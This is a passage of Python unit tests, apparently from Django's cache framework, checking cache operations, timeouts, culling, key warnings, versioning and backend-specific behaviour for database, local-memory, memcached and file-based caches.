    compressed_result = cache.get('binary1')
    self.assertEqual(compressed_value, compressed_result)
    self.assertEqual(value, decompress(compressed_result).decode())

    # Test add
    cache.add('binary1-add', compressed_value)
    compressed_result = cache.get('binary1-add')
    self.assertEqual(compressed_value, compressed_result)
    self.assertEqual(value, decompress(compressed_result).decode())

    # Test set_many
    cache.set_many({'binary1-set_many': compressed_value})
    compressed_result = cache.get('binary1-set_many')
    self.assertEqual(compressed_value, compressed_result)
    self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
    # Multiple keys can be set using set_many
    cache.set_many({"key1": "spam", "key2": "eggs"})
    self.assertEqual(cache.get("key1"), "spam")
    self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
    # set_many takes a second ``timeout`` parameter applied to all keys
    cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
    time.sleep(2)
    self.assertIsNone(cache.get("key1"))
    self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
    # Multiple keys can be deleted using delete_many; unlisted keys survive
    cache.set("key1", "spam")
    cache.set("key2", "eggs")
    cache.set("key3", "ham")
    cache.delete_many(["key1", "key2"])
    self.assertIsNone(cache.get("key1"))
    self.assertIsNone(cache.get("key2"))
    self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
    # The cache can be emptied using clear
    cache.set("key1", "spam")
    cache.set("key2", "eggs")
    cache.clear()
    self.assertIsNone(cache.get("key1"))
    self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
    """
    Follow memcached's convention where a timeout greater than 30 days is
    treated as an absolute expiration timestamp instead of a relative
    offset (#12399).
    """
    cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1)  # 30 days + 1 second
    self.assertEqual(cache.get('key1'), 'eggs')

    cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
    self.assertEqual(cache.get('key2'), 'ham')

    cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
    self.assertEqual(cache.get('key3'), 'sausage')
    self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
    """
    Passing in None into timeout results in a value that is cached forever
    """
    cache.set('key1', 'eggs', None)
    self.assertEqual(cache.get('key1'), 'eggs')

    cache.add('key2', 'ham', None)
    self.assertEqual(cache.get('key2'), 'ham')
    # add() must still refuse to overwrite an existing key
    added = cache.add('key1', 'new eggs', None)
    self.assertIs(added, False)
    self.assertEqual(cache.get('key1'), 'eggs')

    cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
    self.assertEqual(cache.get('key3'), 'sausage')
    self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
    """
    Passing in zero into timeout results in a value that is not cached
    """
    cache.set('key1', 'eggs', 0)
    self.assertIsNone(cache.get('key1'))

    cache.add('key2', 'ham', 0)
    self.assertIsNone(cache.get('key2'))

    cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
    self.assertIsNone(cache.get('key3'))
    self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
    # Make sure a timeout given as a float doesn't crash anything.
    cache.set("key1", "spam", 100.2)
    self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
    # Shared helper for the cull tests: overfill `cull_cache` with
    # `initial_count` keys to trigger culling, then assert exactly
    # `final_count` keys survive.
    # Create initial cache key entries. This will overflow the cache,
    # causing a cull.
    for i in range(1, initial_count):
        cull_cache.set('cull%d' % i, 'value', 1000)
    count = 0
    # Count how many keys are left in the cache.
    for i in range(1, initial_count):
        if cull_cache.has_key('cull%d' % i):
            count += 1
    self.assertEqual(count, final_count)
def test_cull(self):
    # 'cull' alias: MAX_ENTRIES=30, default cull frequency.
    self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
    # 'zero_cull' alias: CULL_FREQUENCY=0 empties the cache on overflow.
    self._perform_cull_test(caches['zero_cull'], 50, 19)
def _perform_invalid_key_test(self, key, expected_warning):
    """
    All the builtin backends (except memcached, see below) should warn on
    keys that would be refused by memcached. This encourages portable
    caching code without making it too difficult to use production backends
    with more liberal key rules. Refs #6447.
    """
    # mimic custom ``make_key`` method being defined since the default will
    # never show the below warnings
    def func(key, *args):
        return key

    old_func = cache.key_func
    cache.key_func = func

    try:
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            cache.set(key, 'value')
            # exactly one CacheKeyWarning with the expected message
            self.assertEqual(len(w), 1)
            self.assertIsInstance(w[0].message, CacheKeyWarning)
            self.assertEqual(str(w[0].message.args[0]), expected_warning)
    finally:
        # always restore the original key function
        cache.key_func = old_func
def test_invalid_key_characters(self):
    # memcached doesn't allow whitespace or control characters in keys.
    key = 'key with spaces and 清'
    expected_warning = (
        "Cache key contains characters that will cause errors if used "
        "with memcached: %r" % key
    )
    self._perform_invalid_key_test(key, expected_warning)
def test_invalid_key_length(self):
    # memcached limits key length to 250.
    key = ('a' * 250) + '清'
    expected_warning = (
        'Cache key will cause errors if used with memcached: '
        '%r (longer than %s)' % (key, 250)
    )
    self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
    # Versioned get/set: a value is only visible under the version it
    # was stored with, whether the version comes from the alias default
    # ('v2' alias has VERSION=2) or an explicit version= argument.
    # set, using default version = 1
    cache.set('answer1', 42)
    self.assertEqual(cache.get('answer1'), 42)
    self.assertEqual(cache.get('answer1', version=1), 42)
    self.assertIsNone(cache.get('answer1', version=2))

    self.assertIsNone(caches['v2'].get('answer1'))
    self.assertEqual(caches['v2'].get('answer1', version=1), 42)
    self.assertIsNone(caches['v2'].get('answer1', version=2))

    # set, default version = 1, but manually override version = 2
    cache.set('answer2', 42, version=2)
    self.assertIsNone(cache.get('answer2'))
    self.assertIsNone(cache.get('answer2', version=1))
    self.assertEqual(cache.get('answer2', version=2), 42)

    self.assertEqual(caches['v2'].get('answer2'), 42)
    self.assertIsNone(caches['v2'].get('answer2', version=1))
    self.assertEqual(caches['v2'].get('answer2', version=2), 42)

    # v2 set, using default version = 2
    caches['v2'].set('answer3', 42)
    self.assertIsNone(cache.get('answer3'))
    self.assertIsNone(cache.get('answer3', version=1))
    self.assertEqual(cache.get('answer3', version=2), 42)

    self.assertEqual(caches['v2'].get('answer3'), 42)
    self.assertIsNone(caches['v2'].get('answer3', version=1))
    self.assertEqual(caches['v2'].get('answer3', version=2), 42)

    # v2 set, default version = 2, but manually override version = 1
    caches['v2'].set('answer4', 42, version=1)
    self.assertEqual(cache.get('answer4'), 42)
    self.assertEqual(cache.get('answer4', version=1), 42)
    self.assertIsNone(cache.get('answer4', version=2))

    self.assertIsNone(caches['v2'].get('answer4'))
    self.assertEqual(caches['v2'].get('answer4', version=1), 42)
    self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
    # add() respects versions: a key may be added independently under
    # different versions, and re-adding an existing (key, version) is a
    # no-op.
    # add, default version = 1, but manually override version = 2
    cache.add('answer1', 42, version=2)
    self.assertIsNone(cache.get('answer1', version=1))
    self.assertEqual(cache.get('answer1', version=2), 42)

    cache.add('answer1', 37, version=2)
    self.assertIsNone(cache.get('answer1', version=1))
    self.assertEqual(cache.get('answer1', version=2), 42)

    cache.add('answer1', 37, version=1)
    self.assertEqual(cache.get('answer1', version=1), 37)
    self.assertEqual(cache.get('answer1', version=2), 42)

    # v2 add, using default version = 2
    caches['v2'].add('answer2', 42)
    self.assertIsNone(cache.get('answer2', version=1))
    self.assertEqual(cache.get('answer2', version=2), 42)

    caches['v2'].add('answer2', 37)
    self.assertIsNone(cache.get('answer2', version=1))
    self.assertEqual(cache.get('answer2', version=2), 42)

    caches['v2'].add('answer2', 37, version=1)
    self.assertEqual(cache.get('answer2', version=1), 37)
    self.assertEqual(cache.get('answer2', version=2), 42)

    # v2 add, default version = 2, but manually override version = 1
    caches['v2'].add('answer3', 42, version=1)
    self.assertEqual(cache.get('answer3', version=1), 42)
    self.assertIsNone(cache.get('answer3', version=2))

    caches['v2'].add('answer3', 37, version=1)
    self.assertEqual(cache.get('answer3', version=1), 42)
    self.assertIsNone(cache.get('answer3', version=2))

    caches['v2'].add('answer3', 37)
    self.assertEqual(cache.get('answer3', version=1), 42)
    self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
    # has_key() only matches the version a value was stored under.
    cache.set('answer1', 42)

    # has_key
    self.assertTrue(cache.has_key('answer1'))
    self.assertTrue(cache.has_key('answer1', version=1))
    self.assertFalse(cache.has_key('answer1', version=2))

    self.assertFalse(caches['v2'].has_key('answer1'))
    self.assertTrue(caches['v2'].has_key('answer1', version=1))
    self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
    # delete() removes only the addressed version; the default version
    # comes from the alias ('v2' deletes version 2 by default) unless
    # overridden with version=.
    cache.set('answer1', 37, version=1)
    cache.set('answer1', 42, version=2)
    cache.delete('answer1')
    self.assertIsNone(cache.get('answer1', version=1))
    self.assertEqual(cache.get('answer1', version=2), 42)

    cache.set('answer2', 37, version=1)
    cache.set('answer2', 42, version=2)
    cache.delete('answer2', version=2)
    self.assertEqual(cache.get('answer2', version=1), 37)
    self.assertIsNone(cache.get('answer2', version=2))

    cache.set('answer3', 37, version=1)
    cache.set('answer3', 42, version=2)
    caches['v2'].delete('answer3')
    self.assertEqual(cache.get('answer3', version=1), 37)
    self.assertIsNone(cache.get('answer3', version=2))

    cache.set('answer4', 37, version=1)
    cache.set('answer4', 42, version=2)
    caches['v2'].delete('answer4', version=1)
    self.assertIsNone(cache.get('answer4', version=1))
    self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
    # incr()/decr() only touch the addressed version; the default version
    # comes from the alias unless overridden with version=.
    cache.set('answer1', 37, version=1)
    cache.set('answer1', 42, version=2)
    cache.incr('answer1')
    self.assertEqual(cache.get('answer1', version=1), 38)
    self.assertEqual(cache.get('answer1', version=2), 42)
    cache.decr('answer1')
    self.assertEqual(cache.get('answer1', version=1), 37)
    self.assertEqual(cache.get('answer1', version=2), 42)

    cache.set('answer2', 37, version=1)
    cache.set('answer2', 42, version=2)
    cache.incr('answer2', version=2)
    self.assertEqual(cache.get('answer2', version=1), 37)
    self.assertEqual(cache.get('answer2', version=2), 43)
    cache.decr('answer2', version=2)
    self.assertEqual(cache.get('answer2', version=1), 37)
    self.assertEqual(cache.get('answer2', version=2), 42)

    cache.set('answer3', 37, version=1)
    cache.set('answer3', 42, version=2)
    caches['v2'].incr('answer3')
    self.assertEqual(cache.get('answer3', version=1), 37)
    self.assertEqual(cache.get('answer3', version=2), 43)
    caches['v2'].decr('answer3')
    self.assertEqual(cache.get('answer3', version=1), 37)
    self.assertEqual(cache.get('answer3', version=2), 42)

    cache.set('answer4', 37, version=1)
    cache.set('answer4', 42, version=2)
    caches['v2'].incr('answer4', version=1)
    self.assertEqual(cache.get('answer4', version=1), 38)
    self.assertEqual(cache.get('answer4', version=2), 42)
    caches['v2'].decr('answer4', version=1)
    self.assertEqual(cache.get('answer4', version=1), 37)
    self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
    """set_many()/get_many() honour the default version and an explicit one."""
    def check(keys, present_version, payload):
        # Probe both caches with their default version and each explicit
        # version; only the version the data lives under returns it.
        for c, default_version in ((cache, 1), (caches['v2'], 2)):
            self.assertEqual(c.get_many(keys), payload if present_version == default_version else {})
            self.assertEqual(c.get_many(keys, version=1), payload if present_version == 1 else {})
            self.assertEqual(c.get_many(keys, version=2), payload if present_version == 2 else {})

    # set, using default version = 1
    cache.set_many({'ford1': 37, 'arthur1': 42})
    check(['ford1', 'arthur1'], 1, {'ford1': 37, 'arthur1': 42})
    # set, default version = 1, but manually override version = 2
    cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
    check(['ford2', 'arthur2'], 2, {'ford2': 37, 'arthur2': 42})
    # v2 set, using default version = 2
    caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
    check(['ford3', 'arthur3'], 2, {'ford3': 37, 'arthur3': 42})
    # v2 set, default version = 2, but manually override version = 1
    caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
    check(['ford4', 'arthur4'], 1, {'ford4': 37, 'arthur4': 42})
def test_incr_version(self):
    """incr_version() moves a cached value from its version to version + 1
    and returns the new version number."""
    def check(c, key, expected_by_version):
        # Probe the cache's default version plus versions 1-3; any version
        # missing from the mapping is expected to be empty (None).
        self.assertEqual(c.get(key), expected_by_version.get('default'))
        for version in (1, 2, 3):
            self.assertEqual(c.get(key, version=version), expected_by_version.get(version))

    cache.set('answer', 42, version=2)
    check(cache, 'answer', {2: 42})
    # The new version number is returned and the value moves to version 3.
    self.assertEqual(cache.incr_version('answer', version=2), 3)
    check(cache, 'answer', {3: 42})

    # Same on a cache whose default VERSION is 2.
    caches['v2'].set('answer2', 42)
    check(caches['v2'], 'answer2', {'default': 42, 2: 42})
    self.assertEqual(caches['v2'].incr_version('answer2'), 3)
    check(caches['v2'], 'answer2', {3: 42})

    # Bumping a nonexistent key is an error.
    with self.assertRaises(ValueError):
        cache.incr_version('does_not_exist')
def test_decr_version(self):
    """decr_version() moves a cached value from its version to version - 1
    and returns the new version number."""
    def check(c, key, expected_by_version):
        # Probe the cache's default version plus versions 1-2; any version
        # missing from the mapping is expected to be empty (None).
        self.assertEqual(c.get(key), expected_by_version.get('default'))
        for version in (1, 2):
            self.assertEqual(c.get(key, version=version), expected_by_version.get(version))

    cache.set('answer', 42, version=2)
    check(cache, 'answer', {2: 42})
    # The new version number is returned and the value moves to version 1,
    # which is the base cache's default.
    self.assertEqual(cache.decr_version('answer', version=2), 1)
    check(cache, 'answer', {'default': 42, 1: 42})

    # Same on a cache whose default VERSION is 2.
    caches['v2'].set('answer2', 42)
    check(caches['v2'], 'answer2', {'default': 42, 2: 42})
    self.assertEqual(caches['v2'].decr_version('answer2'), 1)
    check(caches['v2'], 'answer2', {1: 42})

    # Dropping a nonexistent key is an error.
    with self.assertRaises(ValueError):
        cache.decr_version('does_not_exist', version=2)
def test_custom_key_func(self):
    """Caches with different key functions don't see each other's keys."""
    custom_caches = (caches['custom_key'], caches['custom_key2'])

    # A key written through the default key function...
    cache.set('answer1', 42)
    self.assertEqual(cache.get('answer1'), 42)
    # ...is invisible to both caches using the custom key function.
    for c in custom_caches:
        self.assertIsNone(c.get('answer1'))

    # A key written through the custom key function is invisible to the
    # default cache, but shared between caches using the same function.
    caches['custom_key'].set('answer2', 42)
    self.assertIsNone(cache.get('answer2'))
    for c in custom_caches:
        self.assertEqual(c.get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
    """
    A response carrying state set via set_cookie() survives a round trip
    through the cache middleware intact (content and cookies), and the
    fetched copy can itself be re-cached.
    """
    update_middleware = UpdateCacheMiddleware()
    update_middleware.cache = cache
    fetch_middleware = FetchFromCacheMiddleware()
    fetch_middleware.cache = cache

    request = self.factory.get('/cache/test')
    request._cache_update_cache = True
    # Consistency fix: use the fetch_middleware configured above instead of
    # instantiating a fresh FetchFromCacheMiddleware() for this one call,
    # as the rest of the test already does.
    get_cache_data = fetch_middleware.process_request(request)
    self.assertIsNone(get_cache_data)

    response = HttpResponse()
    content = 'Testing cookie serialization.'
    response.content = content
    response.set_cookie('foo', 'bar')

    # First round trip: cache the response, then fetch it back.
    update_middleware.process_response(request, response)
    get_cache_data = fetch_middleware.process_request(request)
    self.assertIsNotNone(get_cache_data)
    self.assertEqual(get_cache_data.content, content.encode())
    self.assertEqual(get_cache_data.cookies, response.cookies)

    # Second round trip: the cached copy must itself remain cacheable.
    update_middleware.process_response(request, get_cache_data)
    get_cache_data = fetch_middleware.process_request(request)
    self.assertIsNotNone(get_cache_data)
    self.assertEqual(get_cache_data.content, content.encode())
    self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
    """add() must propagate pickling failures, not swallow them silently."""
    unpicklable = Unpicklable()
    with self.assertRaises(pickle.PickleError):
        cache.add('unpicklable', unpicklable)
def test_set_fail_on_pickleerror(self):
    """set() must propagate pickling failures, not swallow them silently."""
    unpicklable = Unpicklable()
    with self.assertRaises(pickle.PickleError):
        cache.set('unpicklable', unpicklable)
def test_get_or_set(self):
    """get_or_set() stores the default on a miss and returns it thereafter."""
    self.assertIsNone(cache.get('projector'))
    # Miss: the default is stored and returned.
    self.assertEqual(cache.get_or_set('projector', 42), 42)
    self.assertEqual(cache.get('projector'), 42)
    # A None default is returned as-is.
    self.assertIsNone(cache.get_or_set('null', None))
def test_get_or_set_callable(self):
    """A callable default is invoked to produce the value to cache."""
    self.assertEqual(cache.get_or_set('mykey', lambda: 'value'), 'value')
    # The key is now populated, so a plain default is ignored and the
    # cached value is returned.
    self.assertEqual(cache.get_or_set('mykey', 'value'), 'value')
def test_get_or_set_version(self):
    """get_or_set() requires an explicit default and respects versions."""
    msg = "get_or_set() missing 1 required positional argument: 'default'"
    cache.get_or_set('brian', 1979, version=2)
    # 'default' is mandatory, with or without an explicit version.
    for kwargs in ({}, {'version': 1}):
        with self.assertRaisesMessage(TypeError, msg):
            cache.get_or_set('brian', **kwargs)
    # Version 1 is still empty; filling it doesn't disturb version 2.
    self.assertIsNone(cache.get('brian', version=1))
    self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
    self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
    self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
    """If add() loses a race (returns False), the default is still returned."""
    add_path = '%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')
    with mock.patch(add_path) as cache_add:
        # Simulate cache.add() failing to add a value. In that case, the
        # default value should be returned.
        cache_add.return_value = False
        self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
    BACKEND='django.core.cache.backends.db.DatabaseCache',
    # Spaces are used in the table name to ensure quoting/escaping is working
    LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
    """Run the common cache test suite against the database backend."""

    available_apps = ['cache']

    def setUp(self):
        # The super call needs to happen first for the settings override.
        super().setUp()
        self.create_table()

    def tearDown(self):
        # The super call needs to happen first because it uses the database.
        super().tearDown()
        self.drop_table()

    def create_table(self):
        # Build the cache table named in LOCATION above.
        management.call_command('createcachetable', verbosity=0)

    def drop_table(self):
        # Drop it directly via SQL; quote_name() handles the embedded spaces.
        with connection.cursor() as cursor:
            table_name = connection.ops.quote_name('test cache table')
            cursor.execute('DROP TABLE %s' % table_name)

    def test_zero_cull(self):
        # Override of the base test with the expected counts for this backend.
        self._perform_cull_test(caches['zero_cull'], 50, 18)

    def test_second_call_doesnt_crash(self):
        # createcachetable must be idempotent: a second run only reports that
        # each configured cache's table already exists.
        out = io.StringIO()
        management.call_command('createcachetable', stdout=out)
        self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))

    @override_settings(CACHES=caches_setting_for_tests(
        BACKEND='django.core.cache.backends.db.DatabaseCache',
        # Use another table name to avoid the 'table already exists' message.
        LOCATION='createcachetable_dry_run_mode'
    ))
    def test_createcachetable_dry_run_mode(self):
        # --dry-run prints the SQL instead of executing it.
        out = io.StringIO()
        management.call_command('createcachetable', dry_run=True, stdout=out)
        output = out.getvalue()
        self.assertTrue(output.startswith("CREATE TABLE"))

    def test_createcachetable_with_table_argument(self):
        """
        Delete and recreate cache table with legacy behavior (explicitly
        specifying the table name).
        """
        self.drop_table()
        out = io.StringIO()
        management.call_command(
            'createcachetable',
            'test cache table',
            verbosity=2,
            stdout=out,
        )
        self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
    """Repeat the database cache tests with USE_TZ enabled."""
class DBCacheRouter:
    """A router that puts the cache table on the 'other' database."""

    def db_for_read(self, model, **hints):
        # Route reads of the cache app's model to 'other'; no opinion otherwise.
        return 'other' if model._meta.app_label == 'django_cache' else None

    def db_for_write(self, model, **hints):
        # Route writes of the cache app's model to 'other'; no opinion otherwise.
        return 'other' if model._meta.app_label == 'django_cache' else None

    def allow_migrate(self, db, app_label, **hints):
        # The cache table may only be created on 'other'; no opinion for
        # every other app.
        if app_label != 'django_cache':
            return None
        return db == 'other'
@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
            'LOCATION': 'my_cache_table',
        },
    },
)
class CreateCacheTableForDBCacheTests(TestCase):
    """createcachetable must respect DATABASE_ROUTERS when picking a database."""

    multi_db = True

    @override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
    def test_createcachetable_observes_database_router(self):
        # cache table should not be created on 'default'
        with self.assertNumQueries(0, using='default'):
            management.call_command('createcachetable', database='default', verbosity=0)
        # cache table should be created on 'other'
        # Queries:
        #   1: check table doesn't already exist
        #   2: create savepoint (if transactional DDL is supported)
        #   3: create the table
        #   4: create the index
        #   5: release savepoint (if transactional DDL is supported)
        num = 5 if connections['other'].features.can_rollback_ddl else 3
        with self.assertNumQueries(num, using='other'):
            management.call_command('createcachetable', database='other', verbosity=0)
class PicklingSideEffect:
    """Helper that records (stickily) whether the given cache's lock was
    write-held at the moment pickle serialized this object."""

    def __init__(self, cache):
        self.cache = cache
        self.locked = False

    def __getstate__(self):
        # Invoked by pickle: once the lock has been observed write-held,
        # `locked` stays True. Serialize to an empty state either way.
        self.locked = self.locked or bool(self.cache._lock.active_writers)
        return {}
@override_settings(CACHES=caches_setting_for_tests(
    BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
    """Run the common cache test suite against the local-memory backend."""

    def setUp(self):
        super().setUp()
        # LocMem requires a hack to make the other caches
        # share a data store with the 'normal' cache.
        for alias in ('prefix', 'v2', 'custom_key', 'custom_key2'):
            caches[alias]._cache = cache._cache
            caches[alias]._expire_info = cache._expire_info

    @override_settings(CACHES={
        'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
        'other': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'LOCATION': 'other'
        },
    })
    def test_multiple_caches(self):
        "Multiple locmem caches are isolated"
        cache.set('value', 42)
        self.assertEqual(caches['default'].get('value'), 42)
        self.assertIsNone(caches['other'].get('value'))

    def test_locking_on_pickle(self):
        """#20613/#18541 -- Ensures pickling is done outside of the lock."""
        bad_obj = PicklingSideEffect(cache)
        # Both write entry points must pickle before taking the lock.
        # (method.__name__ reproduces the original 'set'/'add' keys.)
        for method in (cache.set, cache.add):
            method(method.__name__, bad_obj)
            self.assertFalse(bad_obj.locked, "Cache was locked during pickling")

    def test_incr_decr_timeout(self):
        """incr/decr does not modify expiry time (matches memcached behavior)"""
        key = 'value'
        _key = cache.make_key(key)
        cache.set(key, 1, timeout=cache.default_timeout * 10)
        expire = cache._expire_info[_key]
        for op in (cache.incr, cache.decr):
            op(key)
            self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
configured_caches = {
    _cache_params['BACKEND']: _cache_params
    for _cache_params in settings.CACHES.values()
}

# Params for each memcached client library, or None when not configured.
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')

# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
    """Tests shared by both memcached client backends (run against a live
    memcached server configured in the test settings)."""

    # By default it's assumed that the client doesn't clean up connections
    # properly, in which case the backend must do so after each request.
    should_disconnect_on_close = True

    def test_location_multiple_servers(self):
        # All three LOCATION spellings describe the same two-server pool.
        locations = [
            ['server1.tld', 'server2:11211'],
            'server1.tld;server2:11211',
            'server1.tld,server2:11211',
        ]
        for location in locations:
            with self.subTest(location=location):
                params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
                with self.settings(CACHES={'default': params}):
                    self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])

    def test_invalid_key_characters(self):
        """
        On memcached, we don't introduce a duplicate key validation
        step (for speed reasons), we just let the memcached API
        library raise its own exception on bad keys. Refs #6447.

        In order to be memcached-API-library agnostic, we only assert
        that a generic exception of some kind is raised.
        """
        # memcached does not allow whitespace or control characters in keys
        # when using the ascii protocol.
        with self.assertRaises(Exception):
            cache.set('key with spaces', 'value')

    def test_invalid_key_length(self):
        # memcached limits key length to 250
        with self.assertRaises(Exception):
            cache.set('a' * 251, 'value')

    def test_default_never_expiring_timeout(self):
        # Regression test for #22845
        with self.settings(CACHES=caches_setting_for_tests(
                base=self.base_params,
                exclude=memcached_excluded_caches,
                TIMEOUT=None)):
            cache.set('infinite_foo', 'bar')
            self.assertEqual(cache.get('infinite_foo'), 'bar')

    def test_default_far_future_timeout(self):
        # Regression test for #22845
        with self.settings(CACHES=caches_setting_for_tests(
                base=self.base_params,
                exclude=memcached_excluded_caches,
                # 60*60*24*365, 1 year
                TIMEOUT=31536000)):
            cache.set('future_foo', 'bar')
            self.assertEqual(cache.get('future_foo'), 'bar')

    def test_cull(self):
        # culling isn't implemented, memcached deals with it.
        pass

    def test_zero_cull(self):
        # culling isn't implemented, memcached deals with it.
        pass

    def test_memcached_deletes_key_on_failed_set(self):
        # By default memcached allows objects up to 1MB. For the cache_db session
        # backend to always use the current session, memcached needs to delete
        # the old key if it fails to set.
        # pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
        # tell from a quick check of its source code. This is falling back to
        # the default value exposed by python-memcached on my system.
        max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)

        cache.set('small_value', 'a')
        self.assertEqual(cache.get('small_value'), 'a')

        large_value = 'a' * (max_value_length + 1)
        try:
            cache.set('small_value', large_value)
        except Exception:
            # Some clients (e.g. pylibmc) raise when the value is too large,
            # while others (e.g. python-memcached) intentionally return True
            # indicating success. This test is primarily checking that the key
            # was deleted, so the return/exception behavior for the set()
            # itself is not important.
            pass
        # small_value should be deleted, or set if configured to accept larger values
        value = cache.get('small_value')
        self.assertTrue(value is None or value == large_value)

    def test_close(self):
        # For clients that don't manage their connections properly, the
        # connection is closed when the request is complete.
        signals.request_finished.disconnect(close_old_connections)
        try:
            with mock.patch.object(cache._lib.Client, 'disconnect_all', autospec=True) as mock_disconnect:
                signals.request_finished.send(self.__class__)
                self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
        finally:
            # Always restore the handler so later tests see normal behavior.
            signals.request_finished.connect(close_old_connections)
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
    base=MemcachedCache_params,
    exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
    """Tests specific to the python-memcached client backend."""

    base_params = MemcachedCache_params

    def test_memcached_uses_highest_pickle_version(self):
        # Regression test for #19810
        for cache_key in settings.CACHES:
            with self.subTest(cache_key=cache_key):
                self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)

    @override_settings(CACHES=caches_setting_for_tests(
        base=MemcachedCache_params,
        exclude=memcached_excluded_caches,
        OPTIONS={'server_max_value_length': 9999},
    ))
    def test_memcached_options(self):
        # OPTIONS entries are forwarded to the memcached client.
        self.assertEqual(cache._cache.server_max_value_length, 9999)
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
    base=PyLibMCCache_params,
    exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
    """Tests specific to the pylibmc client backend."""

    base_params = PyLibMCCache_params
    # libmemcached manages its own connections.
    should_disconnect_on_close = False

    # By default, pylibmc/libmemcached don't verify keys client-side and so
    # this test triggers a server-side bug that causes later tests to fail
    # (#19914). The `verify_keys` behavior option could be set to True (which
    # would avoid triggering the server-side bug), however this test would
    # still fail due to https://github.com/lericson/pylibmc/issues/219.
    @unittest.skip("triggers a memcached-server bug, causing subsequent tests to fail")
    def test_invalid_key_characters(self):
        pass

    @override_settings(CACHES=caches_setting_for_tests(
        base=PyLibMCCache_params,
        exclude=memcached_excluded_caches,
        OPTIONS={
            'binary': True,
            'behaviors': {'tcp_nodelay': True},
        },
    ))
    def test_pylibmc_options(self):
        # OPTIONS map onto the pylibmc client's configuration.
        self.assertTrue(cache._cache.binary)
        self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))

    @override_settings(CACHES=caches_setting_for_tests(
        base=PyLibMCCache_params,
        exclude=memcached_excluded_caches,
        OPTIONS={'tcp_nodelay': True},
    ))
    def test_pylibmc_legacy_options(self):
        # Top-level behavior options still work, but raise a deprecation
        # warning with this exact message.
        deprecation_message = (
            "Specifying pylibmc cache behaviors as a top-level property "
            "within `OPTIONS` is deprecated. Move `tcp_nodelay` into a dict named "
            "`behaviors` inside `OPTIONS` instead."
        )
        with warnings.catch_warnings(record=True) as warns:
            warnings.simplefilter("always")
            self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
        self.assertEqual(len(warns), 1)
        self.assertIsInstance(warns[0].message, RemovedInDjango21Warning)
        self.assertEqual(str(warns[0].message), deprecation_message)
@override_settings(CACHES=caches_setting_for_tests(
    BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
    """
    Specific test cases for the file-based cache.
    """

    def setUp(self):
        super().setUp()
        self.dirname = tempfile.mkdtemp()
